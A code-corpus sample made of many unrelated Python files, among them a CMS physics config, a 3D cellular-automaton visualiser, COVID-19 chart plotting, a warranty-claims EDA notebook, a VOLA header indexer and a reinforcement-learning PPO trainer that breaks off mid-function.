process.GlobalTag.globaltag = 'FT_53_V21_AN6::All'
#process.GlobalTag.globaltag = 'START70_V2::All'
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
# input = cms.untracked.int32(5000)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
## '/store/relval/CMSSW_3_1_1/RelValWM/GEN-SIM-RECO/STARTUP31X_V1-v2/0002/8E5D0675-E36B-DE11-8F71-001D09F242EF.root'
# MinBias real data!
# '/store/data/BeamCommissioning09/MinimumBias/RECO/v2/000/124/196/3C9489A4-B5E8-DE11-A475-001D09F2A465.root',
#'/store/data/BeamCommissioning09/MinimumBias/RECO/v2/000/124/188/34641279-B5E8-DE11-A475-001D09F2910A.root',
# Real data
#'/store/data/Run2012B/SingleElectron/AOD/22Jan2013-v1/30000/FE93DA20-837E-E211-8A41-002481E73676.root'
# 'file:12251709-D77E-E211-96C8-003048F118FE.root' # data
# , 'file:5072427B-407E-E211-88EF-003048F237FE.root' #data
# 'file:DEC5AD62-280C-E311-89A7-002618FDA216.root'
# 'file:/tmp/andriusj/ZeePU.root'
'file:/tmp/andriusj/Data2012D_DoubleEl.root'
)
)
runOnData = False
#process.dqmEnv.subSystemFolder = 'SMP'
process.dqmSaver.producer = 'DQM'
process.dqmSaver.workflow = cms.untracked.string('/Physics/EWK/Elec')
process.dqmSaver.convention = 'Offline'
process.dqmSaver.saveByRun = cms.untracked.int32(-1)
process.dqmSaver.saveAtJobEnd =cms.untracked.bool(True)
process.dqmSaver.forceRunNumber = cms.untracked.int32(1)
if runOnData:
process.dqmSaver.saveByRun = cms.untracked.int32(1)
process.dqmSaver.saveAtJobEnd =cms.untracked.bool(False)
process.dqmSaver.forceRunNumber = cms.untracked.int32(-1)
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('detailedInfo'),
detailedInfo = cms.untracked.PSet(
default = cms.untracked.PSet( limit = cms.untracked.int32(100) ),
threshold = cms.untracked.string('DEBUG')
#threshold = cms.untracked.string('INFO')
#threshold = cms.untracked.string('ERROR')
)
)
#process.ana = cms.EDAnalyzer("EventContentAnalyzer")
process.p = cms.Path(process.ewkElecDQM+process.dqmSaver)
| 3,077 | 1,376 |
#version 1
#
#
#Setup data structure
#Made timer that includes fps
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import pyqtgraph as pg
import numpy as np
import random
#import time
from pyqtgraph.ptime import time
import functools
app = QtGui.QApplication([])
w = gl.GLViewWidget()
w.show()
g = gl.GLGridItem()
w.addItem(g)
def nearFunction(mat,i,j,k):
return mat[i+1,j,k-1] or mat[i,j+1,k-1] or mat[i,j,k-1] or \
mat[i-1,j,k] or mat[i,j-1,k] or mat[i,j,k-1] or \
mat[i+2,j,k] or mat[i,j+2,k] or \
mat[i-2,j,k] or mat[i,j-2,k] or mat[i,j,k-2]
def makeSeedRand(mat):
row, col, layer = mat.shape
for i in range(2, row-2):
for j in range(2, col-2):
for k in range(2, layer-2):
#p = 0.311
p = 0.211
randNum = random.uniform(0, 1)
if(randNum <= p):
mat[i,j,k] = 1
#matB[i,j,k] = 1
# if(1*(row/3) < i and i < 2*(row/3)): #middle third
# if(1*(col/3) < j and j < 2*(col/3)): #middle third
# if(k < 1*(layer/3)):
# #if(1*(layer/3) < k and k < 2*(layer/3)): #middle third
# randNum = random.randint(0,25)
# if(randNum <= 1):
# mat[i,j,k] = 1
# #matB[i,j,k] = 1
# else:
# randNum = random.randint(0,250)
# if(randNum <= 1):
# mat[i,j,k] = 1
def plantSeed(mat, numSeeds):
#put in the middle third of box
row, col, layer = mat.shape
for i in range(numSeeds):
rowRand = random.randint(2,row-2);
colRand = random.randint(2,col-2);
layerRand = random.randint(2,layer-2);
mat[rowRand,colRand,layerRand] = 1
def iterateForwardVector():
humCopy = hum.copy()
actCopy = act.copy()
cldCopy = cld.copy()
row, col, lay = hum.shape
hum[2:row-2, 2:col-2, 2:lay-2] = humCopy[2:row-2, 2:col-2, 2:lay-2] & (~ actCopy[2:row-2, 2:col-2, 2:lay-2])
cld[2:row-2, 2:col-2, 2:lay-2] = np.logical_or(cldCopy[2:row-2, 2:col-2, 2:lay-2] , actCopy[2:row-2, 2:col-2, 2:lay-2])
matR1 = np.roll(np.roll(act,-1,axis=0),1,axis=2) # mat[i+1,j,k-1]
matR2 = np.roll(np.roll(act,-1,axis=1),1,axis=2) # mat[i,j+1,k-1]
matR3 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR4 = np.roll(act,1,axis=0) # mat[i-1,j,k]
matR5 = np.roll(act,1,axis=1) # mat[i,j-1,k]
matR6 = np.roll(act,1,axis=2) # mat[i,j,k-1]
matR7 = np.roll(act,-2,axis=0) # mat[i+2,j,k]
matR8 = np.roll(act,-2,axis=1) # mat[i,j+2,k]
matR9 = np.roll(act,2,axis=0) # mat[i-2,j,k]
matR10 = np.roll(act,2,axis=1) # mat[i,j-2,k]
matR11 = np.roll(act,2,axis=2) # mat[i,j,k-2]
act[2:row-2, 2:col-2, 2:lay-2] = (~ actCopy[2:row-2, 2:col-2, 2:lay-2]) & humCopy[2:row-2, 2:col-2, 2:lay-2] & \
np.logical_or(matR1[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR2[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR3[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR4[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR5[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR6[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR7[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR8[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR9[2:row-2, 2:col-2, 2:lay-2],
np.logical_or(matR10[2:row-2, 2:col-2, 2:lay-2],matR11[2:row-2, 2:col-2, 2:lay-2]))))))))))
lenI = 60
lenJ = 60
lenK = 60
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
sp2 = gl.GLScatterPlotItem(pos=indexesFinal,size=1.5,pxMode=False)
w.addItem(sp2)
def resetVars():
global hum, act, cld, indexesFinal
hum = np.zeros((lenI, lenJ, lenK))
act = np.zeros((lenI, lenJ, lenK))
cld = np.zeros((lenI, lenJ, lenK))
hum = hum.astype(int)
act = act.astype(int)
cld = cld.astype(int)
makeSeedRand(hum)
plantSeed(act,2)
indexesFinal = np.array([[1,2,3]])
totalIterations = 80
numIteration = 0
lastTime = time()
fps = None
def update():
global numIteration, indexesFinal, lastTime, fps
if(numIteration < totalIterations) :
sp2.setData(pos=indexesFinal)
indexes = np.where(cld==1)
indexesFinal = np.array([[indexes[0][i],indexes[1][i],indexes[2][i]] for i in range(len(indexes[0]))])
iterateForwardVector()
numIteration+=1
else:
resetVars()
numIteration = 0
now = time()
dt = now - lastTime
lastTime = now
if fps is None:
fps = 1.0/dt
else:
s = np.clip(dt*3., 0, 1)
fps = fps * (1-s) + (1.0/dt) * s
print('%0.2f fps' % fps)
t = QtCore.QTimer()
t.timeout.connect(update)
t.start(5)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, PYQT_VERSION):
QtGui.QApplication.instance().exec_()
| 4,809 | 2,637 |
from .displacy_entity_generator import DisplacyEntityGenerator
| 63 | 17 |
import numpy as np
from artificial_neural_network.layer import Layer
class BiasLayer(Layer):
def __init__(self, dim, learning_rate=0.001):
self.__biases = np.zeros(dim)
self.__learning_rate = learning_rate
def forward(self, x):
return x + self.__biases
def backward(self, x, gradient_y):
gradient_x = gradient_y
gradient_biases = np.sum(gradient_y, axis=0)
self.__biases = self.__biases - self.__learning_rate * gradient_biases
return gradient_x
| 521 | 167 |
from unittest import TestCase
from iota import Address, TransactionHash
from tangle_connector import TangleConnector
class TestTangleConnector(TestCase):
def setUp(self):
self.tangle_con = TangleConnector()
def test_get_node(self):
res = self.tangle_con.get_node()
self.assertEqual(res['appName'], 'IRI')
def test_get_tips(self):
res = self.tangle_con.get_tips()
self.assertTrue(res['hashes'])
def test_get_hashes_from_addr(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
tx_list = self.tangle_con.get_hashes_from_addr(addr)
self.assertTrue(tx_list)
def test_get_trytes_from_hashes(self):
tx = TransactionHash(b'LFHPLTGTTNCYZRCHHCQCBMGUJKFMEHWUDRMHHRUVWNTERXHVEYKWSMZDRLKSYLBFUVTTOFKOFLJI99999')
trytes_list = self.tangle_con.get_trytes_from_hashes([tx])
self.assertTrue(trytes_list)
def test_get_all_trytes_from_address(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
hashes_and_trytes = self.tangle_con.get_all_trytes_from_address(addr)
self.assertTrue(hashes_and_trytes)
def test_send_msg_to_addr(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
res = self.tangle_con.send_msg_to_addr(addr, 'test_string', 'TESTTAG')
self.assertNotIn('Error', res.keys())
def test_get_bundles_from_addr(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
res = self.tangle_con.get_bundles_from_addr(addr)
self.assertTrue(res)
def test_get_messages_from_bundles(self):
addr = Address('CBGEYVNQIBTQFLR999YHPIDSKBBN9FFLDZPAXHWULQDRTFNDHFYEPNEKQOEF9OCKQTPXFRLOCRXMBCOFCODPNDPNPZ')
res = self.tangle_con.get_bundles_from_addr(addr)
output = self.tangle_con.get_messages_from_bundles(res)
self.assertTrue(output)
| 2,102 | 920 |
"""
Helix: Flight Test (c) 2021 Andrew Hong
This code is licensed under GNU LESSER GENERAL PUBLIC LICENSE (see LICENSE for details)
"""
from SakuyaEngine.controllers import BaseController
class PlayerController(BaseController):
def __init__(self) -> None:
super().__init__()
self.is_shooting = False
class SecondaryController(BaseController):
def __init__(self) -> None:
super().__init__()
| 426 | 136 |
import bbhash
# some collection of 64-bit (or smaller) hashes
uint_hashes = [10, 20, 50, 80]
num_threads = 1 # hopefully self-explanatory :)
gamma = 1.0 # internal gamma parameter for BBHash
mph = bbhash.PyMPHF(uint_hashes, len(uint_hashes), num_threads, gamma)
for val in uint_hashes:
print('{} now hashes to {}'.format(val, mph.lookup(val)))
# can also use 'mph.save(filename)' and 'mph = bbhash.load_mphf(filename)'.
| 433 | 174 |
""" Script used to call the upload service"""
from vesicashapi.base import VesicashBase
class Upload(VesicashBase):
@classmethod
def upload(cls, **kwargs):
return cls().requests.post('upload/file', data=kwargs)
| 229 | 72 |
#!/usr/bin/env python
from setuptools import setup
# Work around mbcs bug in distutils.
# http://bugs.python.org/issue10945
import codecs
try:
codecs.lookup('mbcs')
except LookupError:
ascii = codecs.lookup('ascii')
codecs.register(lambda name, enc=ascii: {True: enc}.get(name == 'mbcs'))
VERSION = '0.1.3'
setup(
name='crea-graphenelib',
version=VERSION,
description='Python library for graphene-based blockchains',
long_description=open('README.md').read(),
download_url='https://github.com/creativechain/crea-python-graphenelib/tarball/' + VERSION,
author='Creativechain Foundation',
author_email='info@creativechain.org',
maintainer='Creativechain Foundation',
maintainer_email='info@creativechain.org',
url='http://www.github.com/creativechain/crea-python-graphenelib',
keywords=[
'graphene',
'api',
'rpc',
'ecdsa',
'secp256k1'
],
packages=["grapheneapi",
"graphenebase",
],
install_requires=["ecdsa",
"requests",
"websocket-client",
"pylibscrypt",
"pycryptodome",
],
classifiers=['License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
include_package_data=True,
)
| 1,618 | 500 |
"""
using-enum-declaration:
using elaborated-enum-specifier ;
"""
import glrp
from ...parser import cxx98
from be_typing import TYPE_CHECKING
@glrp.rule('using-enum-declaration : "using" elaborated-enum-specifier ";"')
@cxx98
def using_enum_declaration(self, p):
# type: (CxxParser, glrp.Production) -> None
pass
if TYPE_CHECKING:
from ...parser import CxxParser | 383 | 143 |
t = int(input())
for i in range(t):
pattern = input()
lindex, rindex = map(int, input().split())
d = len(pattern)
a_list = []
r_count = 0
l_count = 0
flag = 0
for j in range(d):
if pattern[j] == "B":
a_list.append(j +1)
for j in a_list:
temp = (rindex - j)//d + 1
r_count += temp
temp = (lindex - j)//d + 1
l_count += temp
if (lindex - j) % d == 0:
flag = 1
print("Case #", i+1, ": ", r_count - l_count + flag, sep="")
| 531 | 207 |
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def parse_method_path(method_path):
""" Returns (package, service, method) tuple from parsing method path """
# unpack method path based on "/{package}.{service}/{method}"
# first remove leading "/" as unnecessary
package_service, method_name = method_path.lstrip('/').rsplit('/', 1)
# {package} is optional
package_service = package_service.rsplit('.', 1)
if len(package_service) == 2:
return package_service[0], package_service[1], method_name
return None, package_service[0], method_name
| 1,121 | 329 |
#!/usr/bin/env python3
"""Reads all the headers in a folder and creates a vola index.
@author Jonathan Byrne
@copyright 2018 Intel Ltd (see LICENSE file).
"""
from __future__ import print_function
import argparse
import glob
import os
import struct
import json
def main():
"""Read the headers, calc the centroids and output."""
parser = argparse.ArgumentParser()
parser.add_argument("pathname",
help="the path containing volume files", type=str)
args = parser.parse_args()
dirname = args.pathname.rstrip('/')
dataset = os.path.basename(dirname)
volaname = os.path.join(dirname, dataset) + ".vola"
vol = os.path.join(dirname, "*.vol")
infofile = os.path.join(dirname, "info.json")
print("Processing folder:", dirname, " output:", volaname)
files = []
tminx, tminy, tminz = float('inf'), float('inf'), float('inf')
tmaxx, tmaxy, tmaxz = float('-inf'), float('-inf'), float('-inf')
filenames = glob.glob(vol)
hdr = {}
for filename in filenames:
with open(filename, "rb") as f:
hdr['headersize'] = struct.unpack('I', f.read(4))[0]
hdr['version'] = struct.unpack('H', f.read(2))[0]
hdr['mode'] = struct.unpack('B', f.read(1))[0]
hdr['depth'] = struct.unpack('B', f.read(1))[0]
hdr['nbits'] = struct.unpack('I', f.read(4))[0]
hdr['crs'] = struct.unpack('I', f.read(4))[0]
hdr['lat'] = struct.unpack('d', f.read(8))[0]
hdr['lon'] = struct.unpack('d', f.read(8))[0]
minx = struct.unpack('d', f.read(8))[0]
miny = struct.unpack('d', f.read(8))[0]
minz = struct.unpack('d', f.read(8))[0]
maxx = struct.unpack('d', f.read(8))[0]
maxy = struct.unpack('d', f.read(8))[0]
maxz = struct.unpack('d', f.read(8))[0]
if minx < tminx:
tminx = minx
if miny < tminy:
tminy = miny
if minz < tminz:
tminz = minz
if maxx > tmaxx:
tmaxx = maxx
if maxy > tmaxy:
tmaxy = maxy
if maxz > tmaxz:
tmaxz = maxz
bbox = [minx, miny, minz, maxx, maxy, maxz]
sides = [maxx - minx, maxy - miny, maxz - minz]
centroid = ((minx + maxx) / 2, (miny + maxy) / 2, (minz + maxz) / 2)
files.append({
'filename': filename,
'bbox': bbox,
'centroid': centroid,
'sides': sides,
'crs': hdr['crs'],
'lat': hdr['lat'],
'lon': hdr['lon']
})
if not os.path.isfile(infofile):
print("Missing attribution info file!! Attribution is required")
exit()
else:
with open(infofile) as data_file:
infodata = json.load(data_file)
if len(infodata['license']) < 5:
print("No license information!! License is required")
exit()
vola = {}
print("Depth:", hdr['depth'])
vola['dataset'] = infodata['dataset']
vola['info'] = infodata['info']
vola['url'] = infodata['url']
vola['author'] = infodata['author']
vola['authorurl'] = infodata['authorurl']
vola['license'] = infodata['license']
vola['licenseurl'] = infodata['licenseurl']
vola['files'] = files
vola['depth'] = hdr['depth']
vola['nbits'] = hdr['nbits']
vola['crs'] = hdr['crs']
vola['mode'] = hdr['mode']
vola['bbox'] = [tminx, tminy, tminz, tmaxx, tmaxy, tmaxz]
vola['sides'] = [tmaxx - tminx, tmaxy - tminy, tmaxz - tminz]
vola['centroid'] = ((tminx + tmaxx) / 2, (tminy + tmaxy) / 2,
(tminz + tmaxz) / 2)
volafile = open(volaname, 'w')
volafile.write(json.dumps(vola, sort_keys=True, indent=2))
volafile.close()
if __name__ == '__main__':
main()
| 3,852 | 1,426 |
from datetime import datetime, timedelta
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.optimize as opt
def area_chart(ds, dateFmt):
# create a subplot
fig, ax = plt.subplots()
# set figure size and dpi
fig.set_size_inches(10, 5)
fig.set_dpi(300)
# draw the curves
ax.fill_between(
ds['Data'],
ds['Casos acumulados'],
color='#f44336',
label='Casos totais ({})'.format(ds['Casos acumulados'].values[-1]))
ax.stackplot(
ds['Data'],
ds['Óbitos acumulados'],
ds['Curados acumulados'],
colors=['#9a9a9a', '#009688'],
labels=[
'Óbitos totais ({})'.format(ds['Óbitos acumulados'].values[-1]),
'Curados totais ({})'.format(ds['Curados acumulados'].values[-1])])
# write the total number at the end of the curves
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Casos acumulados'].values[-1],
str(ds['Casos acumulados'].values[-1]),
color='w')
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Curados acumulados'].values[-1],
str(ds['Curados acumulados'].values[-1]),
color='w')
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Óbitos acumulados'].values[-1],
str(ds['Óbitos acumulados'].values[-1]),
color='w')
# set chart style
ax.xaxis.set_major_formatter(dateFmt)
ax.set_facecolor('#101010')
# set chart title
ax.title.set_text(
'Situação geral da COVID-19 em Fernandópolis - {}'
.format(ds['Data'].iloc[-1].strftime('%d/%m/%Y')))
# draw legend on the upper left corner
ax.legend(loc='upper left')
# save chart as a png
fig.savefig('../images/area_chart.png')
def bar_chart(ds, dateFmt):
# create a subplot
fig, ax = plt.subplots()
# set figure size and dpi
fig.set_size_inches(10, 5)
fig.set_dpi(300)
# calculate moving average
moving_average = ds['Novos casos'].rolling(window=14).mean()
# draw the bars
ax.bar(
ds['Data'],
ds['Novos casos'],
color='#f44336',
label='Casos novos de {} ({})'.format(
ds['Data'].iloc[-1].strftime('%d/%m/%Y'),
ds['Novos casos'].values[-1]))
ax.plot(
ds['Data'],
moving_average,
color='#f4a235',
linestyle='dashed',
label='Média móvel de casos novos ({})'.format(
int(np.trunc(moving_average.iloc[-1]))))
# write the number of cases at the top of each bar
for date in ds['Data']:
i = (date - datetime.fromisoformat('2020-03-25')).days
y = ds['Novos casos'].values[i]
if y != 0:
ax.text(
date - np.timedelta64(12, 'h'),
y + 0.25,
str(y),
color='w')
# set chart style
ax.xaxis.set_major_formatter(dateFmt)
ax.set_facecolor('#101010')
# set chart title
ax.title.set_text(
'Casos novos da COVID-19 em Fernandópolis - {}'
.format(ds['Data'].iloc[-1].strftime('%d/%m/%Y')))
# draw legend on the upper left corner
ax.legend(loc='upper left')
# save chart as a png
fig.savefig('../images/bar_chart.png')
def line_chart(ds, dateFmt):
# create a subplot
fig, ax = plt.subplots()
# set figure size and dpi
fig.set_size_inches(10, 5)
fig.set_dpi(300)
# polynomial function
def func(x, a, b, c, d, e, f, g):
params = [a, b, c, d, e, f, g]
n = len(params)
total = 0
for i in range(0, n):
total += params[n - i - 1] * np.power(x, i)
return total
# optimized parameters for exponential curve fitting
optimizedParameters, _ = opt.curve_fit(
func,
ds['Data'].map(
lambda x: (x - datetime.fromisoformat('2020-03-25')).days),
ds['Casos acumulados'])
# list of days extended over 7 days
extDate = ds['Data'].copy()
for i in range(1, 8):
extDate = extDate.append(
pd.Series(
[ds['Data'].iloc[-1] + timedelta(days=i)],
index=[ds['Data'].size + i - 1]))
# draw the curves
ax.plot(
ds['Data'],
ds['Casos acumulados'],
color='#f44336',
label='Casos totais ({})'.format(ds['Casos acumulados'].values[-1]))
ax.plot(
extDate,
func(
extDate.map(
lambda x: (x - datetime.fromisoformat('2020-03-25')).days),
*optimizedParameters),
color='#f4a235',
linestyle='dashed',
label='Projeção do número de casos até {} ({:.0f})'.format(
extDate.iloc[-1].strftime('%d/%m/%Y'),
np.floor(func(
(extDate.iloc[-1] - datetime.fromisoformat('2020-03-25')).days,
*optimizedParameters))))
# write the number of cases at the end of the curve
ax.text(
ds['Data'].values[-1] + np.timedelta64(12, 'h'),
ds['Casos acumulados'].values[-1],
str(ds['Casos acumulados'].values[-1]),
color='w')
ax.text(
extDate.iloc[-1] + timedelta(hours=12),
func(
(extDate.iloc[-1] - datetime.fromisoformat('2020-03-25')).days,
*optimizedParameters),
'{:.0f}'.format(
np.floor(func(
(extDate.iloc[-1] - datetime.fromisoformat('2020-03-25')).days,
*optimizedParameters))),
color='w')
# set chart style
ax.xaxis.set_major_formatter(dateFmt)
ax.set_facecolor('#101010')
# set chart title
ax.title.set_text(
'Casos da COVID-19 em Fernandópolis - {}'
.format(ds['Data'].iloc[-1].strftime('%d/%m/%Y')))
# draw legend on the upper left corner
ax.legend(loc='upper left')
# save chart as a png
fig.savefig('../images/line_chart.png')
def main():
ds = pd.read_csv('../boletim-epidemiologico.csv')
ds['Data'] = ds['Data'].map(
lambda x: datetime.strptime(str(x), '%d/%m/%y'))
dateFmt = mdates.DateFormatter('%d/%m/%y')
area_chart(ds, dateFmt)
bar_chart(ds, dateFmt)
line_chart(ds, dateFmt)
if __name__ == '__main__':
main()
| 6,324 | 2,310 |
# %% [markdown]
'''
# Calculate suspect score for manufacturing claims
'''
# %% [markdown]
'''
# Problem statement
'''
# %% [markdown]
'''
**Author** : Sunil Yadav || yadav.sunil83@gmail.com || +91 96206 38383 ||
'''
# %% [markdown]
'''
# Solution Approach
- Check if we can correctly segregate suspected claims
- Prepare model
'''
# %% [markdown]
'''
# Solution
'''
# %% [markdown]
'''
## Lib Imports
'''
# %%
import src.utils.eda as eu
import set_base_path
import numpy as np
import pandas as pd
from IPython.display import display
import plotly.figure_factory as ff
import plotly.graph_objects as go
from enum import Enum, auto
from typing import List, Sequence, Tuple
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import seaborn as sns
import plotly.express as px
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
import warnings
from src.constants import RAW_DATA_PATH, INTERIM_DATA_PATH, CLAIM_CAT_COLS
warnings.filterwarnings('ignore')
# %%
# Ignore warnings
# %% [markdown]
'''
## Data load
'''
# %%
# Load Data
merged_df: pd.DataFrame = pd.read_feather(INTERIM_DATA_PATH / "merged_df.feather")
claims_with_amount: pd.DataFrame = pd.read_feather(RAW_DATA_PATH / "claims_with_amount.feather")
labour: pd.DataFrame = pd.read_feather(RAW_DATA_PATH / "labour.feather")
parts_replaced: pd.DataFrame = pd.read_feather(RAW_DATA_PATH / "parts_replaced.feather")
# %% [markdown]
'''
## Pandas settings
'''
# %%
pd.options.display.max_columns = 300
pd.options.display.max_rows = 300
pd.options.display.width = None
pd.options.display.max_colwidth = 100
pd.options.display.precision = 3
# %% [markdown]
'''
# EDA
'''
# %% [markdown]
'''
## Data Overview
'''
# %% [markdown]
'''
### Merged DF
'''
# %%
# eu.get_data_frame_overview(merged_df)
# %%
# %%
pivoted_columns = list(labour['JOB_CODE'].unique()) + list(parts_replaced['INS_PART_CODE'].unique())
zeros = merged_df[pivoted_columns] == 0.
(((zeros).sum()*100)/merged_df.shape[0]).sort_values(ascending=False)
# %%
# Claims Data
eu.get_data_frame_overview(claims_with_amount)
# %%
# %% [markdown]
'''
### Univariate
'''
# %% [markdown]
'''
#### value counts
'''
# %%
eu.print_value_count_percents(claims_with_amount[CLAIM_CAT_COLS])
# %% [markdown]
'''
#### value counts plots
'''
# %%
eu.plot_univariate_categorical_columns(claims_with_amount[CLAIM_CAT_COLS], x_rotation=90, plot_limit=50)
# %% [markdown]
'''
#### distributions
'''
# %%
claims_with_amount.dtypes
# %%
num_cols = claims_with_amount.dtypes[claims_with_amount.dtypes == np.float].index
# %%
claims_with_amount[num_cols].isnull().sum()
# %%
eu.plot_dist(claims_with_amount[num_cols])
# %% [markdown]
'''
## Drop unwanted columns
'''
# %% [markdown]
'''
## Fix column dtypes
'''
# %% [markdown]
'''
#### Plotting numeric and categorical
'''
# %%
num_cols, CLAIM_CAT_COLS
# %%
len(num_cols), len(CLAIM_CAT_COLS)
# %% [markdown]
'''
### Bi-variate
'''
# %% [markdown]
'''
### Correlation
'''
# %%
plt.figure(figsize=(10, 10))
sns.heatmap(claims_with_amount[num_cols].corr(), annot=True)
plt.show()
# Mostly positive correlated data
# %% [markdown]
'''
#### Numeric-Numeric (Scatter plot)
'''
# %%
eu.plot_two_variables(claims_with_amount, 'CLAIMED_AMOUNT', 'CLAIM_PAID_AMOUNT')
# %%
plt.figure(figsize=(10, 10))
eu.plot_two_variables(claims_with_amount, 'UNITS_USAGE', 'CLAIM_PAID_AMOUNT')
# %% [markdown]
'''
#### Numeric-Categorical (Box and violin)
'''
# %%
new_cols_cat = CLAIM_CAT_COLS[:]
for rem_col in ["DEALER_NUMBER", "CAUSAL_REG_PART", "DEALER_CITY", "DEALER_STATE", "FAULT_LOCN", "FAULT_CODE"]:
new_cols_cat.remove(rem_col)
for col in new_cols_cat:
plt.figure(figsize=(35, 10))
print(f"\nPlotting {col} vs CLAIM_PAID_AMOUNT\n")
eu.plot_two_variables(claims_with_amount, col, 'CLAIM_PAID_AMOUNT', x_rotation=90, legend=False)
# %% [markdown]
'''
#### Categorical-Categorical (Cross Table)
'''
# %%
pd.crosstab(claims_with_amount['CLAIM_TYPE'], claims_with_amount['CLAIM_STATE'])
# %%
# TODO: Not working need to check data types
pd.crosstab(claims_with_amount['CLAIM_TYPE'], claims_with_amount[['CLAIM_STATE', 'APPLICABLE_POLICY',
'DEALER_NUMBER',
'DEALER_CITY',
'DEALER_STATE',
'DEALER_COUNTRY',
'CAUSAL_REG_PART',
'FAULT_CODE',
'FAULT_LOCN',
'REG_PRODUCT_FAMILY_NAME',
'REG_SERIES_NAME',
'MODEL_NAME',
'REG_MODEL_CODE',
'VARIANT']])
# %% [markdown]
'''
Print a data frame with color
'''
# %%
'''
Drop columns
Single valued
Drop Rows
'''
| 5,297 | 1,870 |
from ztag.annotation import *
class AmericanMegatrends(Annotation):
protocol = protocols.HTTPS
subprotocol = protocols.HTTPS.TLS
port = None
tests = {
"american_megatrends":{
"local_metadata":{
"manufacturer": Manufacturer.AMERICANMEGATRENDS
}
}
}
def process(self, obj, meta):
organization = obj["certificate"]["parsed"]["subject"]["organization"][0]
if "American Megatrends Inc" in organization:
meta.local_metadata.manufacturer = Manufacturer.AMERICANMEGATRENDS
return meta
| 603 | 184 |
"""
The :mod:`viz` module provides visualization capability
"""
import viz.BarsViz
import viz.BernViz
import viz.GaussViz
import viz.SequenceViz
import viz.ProposalViz
import viz.PlotTrace
import viz.PlotELBO
import viz.PlotK
import viz.PlotHeldoutLik
import viz.PlotParamComparison
import viz.PlotComps
import viz.JobFilter
import viz.TaskRanker
import viz.BestJobSearcher
__all__ = ['GaussViz', 'BernViz', 'BarsViz', 'SequenceViz',
'PlotTrace', 'PlotELBO', 'PlotK', 'ProposalViz',
'PlotComps', 'PlotParamComparison',
'PlotHeldoutLik', 'JobFilter', 'TaskRanker', 'BestJobSearcher']
| 621 | 220 |
from typing import Tuple
import torch
from habitat_baselines.rl.ddppo.algo.ddppo import DDPPO
from torch.functional import Tensor
from torch.nn.functional import l1_loss
class WDDPPO(DDPPO):
"""Differences with DD-PPO:
- expands entropy calculation and tracking to three variables
- adds a regularization term to the offset prediction
"""
def __init__(
self,
*args,
offset_regularize_coef: float = 0.0,
pano_entropy_coef: float = 1.0,
offset_entropy_coef: float = 1.0,
distance_entropy_coef: float = 1.0,
**kwargs,
) -> None:
super().__init__(*args, **kwargs)
self.offset_regularize_coef = offset_regularize_coef
self.pano_entropy_coef = pano_entropy_coef
self.offset_entropy_coef = offset_entropy_coef
self.distance_entropy_coef = distance_entropy_coef
def get_advantages(self, rollouts) -> Tensor:
advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]
if not self.use_normalized_advantage:
return advantages
return (advantages - advantages.mean()) / (advantages.std() + 1e-5)
def update(self, rollouts) -> Tuple[float, float, float]:
advantages = self.get_advantages(rollouts)
value_loss_epoch = 0.0
action_loss_epoch = 0.0
entropy_loss_epoch = 0.0
pano_entropy_epoch = 0.0
offset_entropy_epoch = 0.0
distance_entropy_epoch = 0.0
for _e in range(self.ppo_epoch):
data_generator = rollouts.recurrent_generator(
advantages, self.num_mini_batch
)
for sample in data_generator:
(
obs_batch,
recurrent_hidden_states_batch,
actions_batch,
prev_actions_batch,
value_preds_batch,
return_batch,
masks_batch,
old_action_log_probs_batch,
adv_targ,
) = sample
# Reshape to do in a single forward pass for all steps
(
values,
action_log_probs,
entropy,
_,
) = self.actor_critic.evaluate_actions(
obs_batch,
recurrent_hidden_states_batch,
prev_actions_batch,
